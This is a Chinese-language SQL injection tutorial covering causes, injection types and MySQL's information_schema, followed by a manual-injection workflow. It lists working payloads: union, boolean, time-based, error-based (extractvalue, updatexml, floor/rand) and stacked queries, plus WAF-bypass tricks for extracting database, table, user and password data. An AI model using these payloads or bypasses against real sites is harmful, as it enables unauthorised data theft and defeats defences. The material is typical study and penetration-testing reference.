SQL注入之基础原理
一、SQL注入的产生
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
二、SQL注入原理
SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。基于此,SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。
三、SQL注入的类型
常见的SQL注入有以下几种:
- 按变量类型分类
- 数字型
- 字符型
- 按HTTP提交方式分类
- GET型注入
- POST型注入
- Cookie注入
- HTTP头部注入
- 按注入方式分类
- 报错注入
- 盲注
- UNION注入
- 布尔型注入
- 时间注入
- 宽字节注入(主要针对GBK编码类型)
四、数据库
常见数据库类型:
MYSQL:
MySQL5.0之后和5.0之前版本有很大的区别,,MySQL5.0以上存在一个存储着数据库信息的信息数据库–INFORMATION_SCHEMA ,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。 而5.0以下没有。
information_schema
系统数据库,记录当前数据库的数据库,表,列,用户权限等信息
SCHEMATA
储存mysql所有数据库的基本信息,包括数据库名,编码类型路径等
TABLES
储存mysql中的表信息,包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等
COLUMNS
储存mysql中表的列信息,包括这个表的所有列以及每个列的信息,该列是表中的第几列,列的数据类型,列的编码类型,列的权限,列的注释等
MSSQL:
注入靠比大小。
Oracle:
Oracle的数据类型是强匹配的(MySQL有弱匹配的味道),所以在Oracle进行类似UNION查询数据时候必须让对应位置上的数据类型和表中的列的数据类型是一致的,也可以使用null代替某些无法快速猜测出数据类型的位置。
PostgreSQL:
PostgreSQL是一款关系型数据库,广泛应用在Web编程当中,由于其语法与MySQL不尽相同,所以其SQL注入又自成一派。
Access:
没有库结构,只有表和列,只能通过字典爆破。
五、基于手工注入流程
要从select语句中获取有用的信息,必须确定该数据库中的字段数和那个字段能够输出,这是前提。
1. MySQL >= 5.0
获取字段数
order by n /通过不断尝试改变n的值来观察页面反应确定字段数/
获取系统数据库名
在MySQL >5.0中,数据库名存放在information_schema数据库下schemata表schema_name字段中
select null,null,schema_name from information_schema.schemata
获取当前数据库名
select null,null,...,database()
获取数据库中的表
select null,null,...,group_concat(table_name) from information_schema.tables where table_schema=database()
或
select null,null,...,table_name from information_schema.tables where table_schema=database() limit 0,1
获取表中的字段
这里假设已经获取到表名为user
select null,null,...,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'
获取各个字段值
这里假设已经获取到表名为user,且字段为username和password
select null,group_concat(username,password) from users
2. MySQL < 5.0
MySQL < 5.0 没有信息数据库information_schema,所以只能手工枚举爆破(二分法思想)。
该方式通常用于盲注。
相关函数
length(str) :返回字符串str的长度
substr(str, pos, len) :将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始
mid(str,pos,len) :跟上面的一样,截取字符串
ascii(str) :返回字符串str的最左面字符的ASCII代码值
ord(str) :将字符或布尔类型转成ascll码
if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0
基于布尔的盲注
and ascii(substr((select database()),1,1))>64 /判断数据库名的第一个字符的ascii值是否大于64/
基于时间的盲注
id=1 union select if(SUBSTRING(user(),1,4)='root',sleep(4),1),null,null /提取用户名前四个字符做判断,正确就延迟4秒,错误返回1/
六、常用注入方式
注释符:
#
– (有空格)或–+
/**/
内联注释:
/*!...*/
union注入
id =-1 union select 1,2,3 /获取字段/
Boolean注入
id=1' substr(database(),1,1)='t'--+ /判断数据名长度/
报错注入
floor()和rand()
union select count(*),2,concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a /利用错误信息得到当前数据库名/
extractvalue()
id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
updatexml()
id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))
geometrycollection()
id=1 and geometrycollection((select * from(select * from(select user())a)b))
multipoint()
id=1 and multipoint((select * from(select * from(select user())a)b))
polygon()
id=1 and polygon((select * from(select * from(select user())a)b))
multipolygon()
id=1 and multipolygon((select * from(select * from(select user())a)b))
linestring()
id=1 and linestring((select * from(select * from(select user())a)b))
multilinestring()
id=1 and multilinestring((select * from(select * from(select user())a)b))
exp()
id=1 and exp(~(select * from(select user())a))
时间注入
id = 1 and if(length(database())>1,sleep(5),1)
堆叠查询注入
id = 1';select if(sub(user(),1,1)='r',sleep(3),1)%23
二次注入
七、SQL注入绕过技术
大小写绕过
双写绕过
编码绕过(url全编码、十六进制)
内联注释绕过
关键字替换
逗号绕过
substr、mid()函数中可以利用from to来摆脱对逗号的利用;
limit中可以利用offset来摆脱对逗号的利用
比较符号( >、< )绕过(greatest、between and)
逻辑符号的替换(and=&& or=|| xor=| not=!)
空格绕过(用括号,+等绕过)
等价函数绕过
hex()、bin()=ascii()
concat_ws()=group_concat()
mid()、substr()=substring()
http参数污染
(id=1 union select+1,2,3+from+users+where+id=1–变为id=1 union select+1&id=2,3+from+users+where+id=1–)
缓冲区溢出绕过
(id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36–+
其中0xAAAAAAAAAAAAAAAAAAAAA这里A越多越好。。一般会存在临界值,其实这种方法还对后缀名的绕过也有用)
--------------------------------------------- END -------------------------------------------